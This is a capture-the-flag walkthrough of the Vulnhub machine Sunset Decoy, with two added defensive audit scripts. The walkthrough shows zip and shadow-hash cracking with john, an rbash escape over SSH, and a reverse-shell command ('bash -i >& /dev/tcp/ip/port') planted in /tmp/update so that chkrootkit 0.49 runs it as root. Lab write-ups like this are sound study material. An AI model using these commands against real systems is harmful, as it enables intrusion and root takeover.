Hi guys! In this article, I'm going to show you how to solve the machine named Sunset Decoy on the Vulnhub platform. Sunset Decoy is an easy-level machine and it contains a user flag and a root flag. The first recon step is unzipping a password-protected zip file found on the running web server. The files recovered by cracking that zip's password give us the initial foothold. Once we have the user's password, SSH login is the next step, but at this point a trick is needed to bypass rbash. After the bypass, enumeration shows the way to root: exploiting a chkrootkit vulnerability gives local privilege escalation, and then finally the root flag.
ENUMERATION AND USER
I ran nmap first, as always. I did directory fuzzing and some other recon while nmap was running but didn't get any results.
As you can see, port 22 and port 80 are open. There is a web service running on port 80, and a zip file is served from it. This zip file is password protected, so after downloading it we need to crack its password. To do this, we convert the zip file to john format with the "/usr/sbin/zip2john save.zip > save.hash" command.
After converting it, we crack the password with john, using the "john save.hash --wordlist=rockyou.txt" command.
And we got the password for the zip file: "manuel". After unzipping it, we see that it contains some very useful files, such as passwd and shadow. We view the content of the shadow file and get the hashes of root and of the user.
We copy the root and user password hashes into a hashes file to crack them. See the content of the hash file below.
Now we crack these hashes using the "john hashes.txt --wordlist=rockyou.txt" command.
And we get the user's password: "server". Now we can log in as the user over SSH and get the user flag!
As you can see in the photo above, we got a restricted shell. It means we cannot run commands freely. As you can see, when I try to enter the SV-502 directory it errors with "restricted". There are some ways to bypass it. We will bypass it by logging in over SSH with the "bash --noprofile" argument. To do this, let's run "ssh <user>@<target-ip> -t "bash --noprofile"" (substituting the user name and the target IP).
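The bypass above works because sshd hands a client-supplied command to the account's login shell with "-c", so a restricted shell on its own is not a security boundary; the server-side fix is a "Match User" block with ForceCommand, which makes sshd ignore whatever command the client sends. The following audit script is an added example (not part of the original write-up) that lists accounts whose shell is rbash and reports those without such a block. The passwd and sshd_config contents it reads are constructed samples, and the hypothetical /usr/local/bin/restricted-menu path is just a placeholder for whatever command the administrator wants to pin.

```shell
#!/bin/sh
# Added example (not from the original write-up): find accounts that rely on
# rbash but have no "Match User <name>" block with ForceCommand in sshd_config.
# All file contents below are constructed for the example.

# Print users whose login shell is rbash, reading a passwd-format file ($1).
rbash_users() {
    awk -F: '$7 ~ /\/rbash$/ { print $1 }' "$1"
}

# Exit 0 if the sshd_config in $1 has a "Match User $2" block that contains
# ForceCommand, 1 otherwise.  A Match block runs until the next Match line.
# Only per-user Match blocks are checked; a global ForceCommand is not considered.
has_forcecommand() {
    awk -v user="$2" '
        tolower($1) == "match" {
            inblock = 0
            for (i = 2; i <= NF; i++)
                if (tolower($i) == "user" && $(i + 1) == user) inblock = 1
            next
        }
        inblock && tolower($1) == "forcecommand" { found = 1 }
        END { exit found ? 0 : 1 }
    ' "$1"
}

# Report every rbash user not pinned by ForceCommand.
# $1 = passwd-format file, $2 = sshd_config.  Exit 0 when clean, 1 on findings.
audit_restricted_users() {
    bad=0
    for u in $(rbash_users "$1"); do
        if ! has_forcecommand "$2" "$u"; then
            echo "$u: login shell is rbash but sshd has no ForceCommand for this user"
            bad=1
        fi
    done
    return $bad
}

# --- constructed samples ---------------------------------------------------
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT

cat > "$tmp/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
restricted:x:1001:1001::/home/restricted:/bin/rbash
normal:x:1002:1002::/home/normal:/bin/bash
EOF

# Weak: rbash is the only control, so "ssh user@host -t 'bash --noprofile'" gets through.
cat > "$tmp/sshd_weak" <<'EOF'
PermitRootLogin no
EOF

# Hardened: sshd ignores the client's command and runs the pinned one instead.
cat > "$tmp/sshd_hardened" <<'EOF'
PermitRootLogin no
Match User restricted
    ForceCommand /usr/local/bin/restricted-menu
    PermitTTY no
EOF

echo "== weak config =="
if audit_restricted_users "$tmp/passwd" "$tmp/sshd_weak"; then echo "clean"; fi
echo "== hardened config =="
if audit_restricted_users "$tmp/passwd" "$tmp/sshd_hardened"; then echo "clean"; fi
```

Run it against the real /etc/passwd and /etc/ssh/sshd_config to audit a host; note that "Match User" can also take a comma-separated list of names, which this simple parser does not expand.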
So you can see that we can now run the "cd" command. And we see that there is a log file. Let's view it.
When we view the content of the log file, we see that it is pspy output and it shows the processes run on the machine. Something caught my interest at this point: chkrootkit could be the way. To be sure, I ran pspy on the machine and got the result shown in the photo below.
It is in cron, so chkrootkit runs automatically. After finding this out, I searched for known vulnerabilities in chkrootkit 0.49 and found one.
This is the way to privilege escalation, i.e. root. The description explains how to exploit it: basically, put a reverse shell script in a file named update under the /tmp directory.
So we create a file named update and put the "bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'" command in it.
Then, in another terminal, we listen on the port we set. After a while we get a shell as root, and the root flag!
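From the defender's side, the root path above needs three things at once: a chkrootkit release of 0.49 or older, a root cron job that runs it, and a file named update that someone can drop into /tmp. The following script is an added example (not part of the original write-up) that checks for each condition on a host so the combination can be found and fixed before anyone plants that file. The version strings, crontab lines and temporary directory it uses are constructed samples; on a real host you would pass the output of "chkrootkit -V", the root crontab and /tmp.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit for the chkrootkit 0.49
# cron weakness.  Nothing here exploits anything; each function only inspects.
# Version strings, crontab files and the temp directory below are constructed.

# Exit 0 when a chkrootkit version string ($1) is 0.49 or older.
chkrootkit_version_affected() {
    major=${1%%.*}
    minor=${1#*.}
    minor=${minor%%.*}
    [ "$major" -eq 0 ] && [ "$minor" -le 49 ]
}

# Exit 0 when a crontab-format file ($1) has an active (uncommented) line
# that runs chkrootkit.
cron_runs_chkrootkit() {
    grep -Eq '^[^#]*chkrootkit' "$1"
}

# Exit 0 when a file named "update" exists in directory $1; print its owner
# and mode so the analyst can judge who was able to create it.
tmp_update_present() {
    if [ -e "$1/update" ]; then
        ls -l "$1/update"
        return 0
    fi
    return 1
}

# Combine the checks.  $1 = version, $2 = crontab file, $3 = temp directory.
# Exit 0 when clean, 1 when at least one finding was printed.
audit_chkrootkit() {
    findings=0
    if chkrootkit_version_affected "$1"; then
        echo "chkrootkit $1 is 0.49 or older: upgrade (0.50 fixed the /tmp/update handling)"
        findings=1
    fi
    if cron_runs_chkrootkit "$2"; then
        echo "cron runs chkrootkit as root: with an old version this is a privilege-escalation path"
        findings=1
    fi
    if tmp_update_present "$3"; then
        echo "$3/update exists: inspect and remove it; the old version would execute it as root"
        findings=1
    fi
    return $findings
}

# --- constructed samples ---------------------------------------------------
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT

# Root crontab as seen on the vulnerable host (constructed line).
printf '*/1 * * * * root /usr/sbin/chkrootkit\n' > "$tmp/crontab"
# A crontab with no chkrootkit entry, for comparison.
printf '0 3 * * * root /usr/bin/apt-get update\n' > "$tmp/crontab_clean"
# An empty planted file, standing in for whatever an attacker would drop.
: > "$tmp/update"
# A temp directory with nothing planted.
mkdir "$tmp/clean"

echo "== vulnerable host =="
if audit_chkrootkit 0.49 "$tmp/crontab" "$tmp"; then echo "clean"; fi
echo "== patched host =="
if audit_chkrootkit 0.50 "$tmp/crontab_clean" "$tmp/clean"; then echo "clean"; fi
```

Any one finding is worth acting on, but the first two together are the real risk: a world-writable /tmp guarantees that the third condition can be created by any local user at any time.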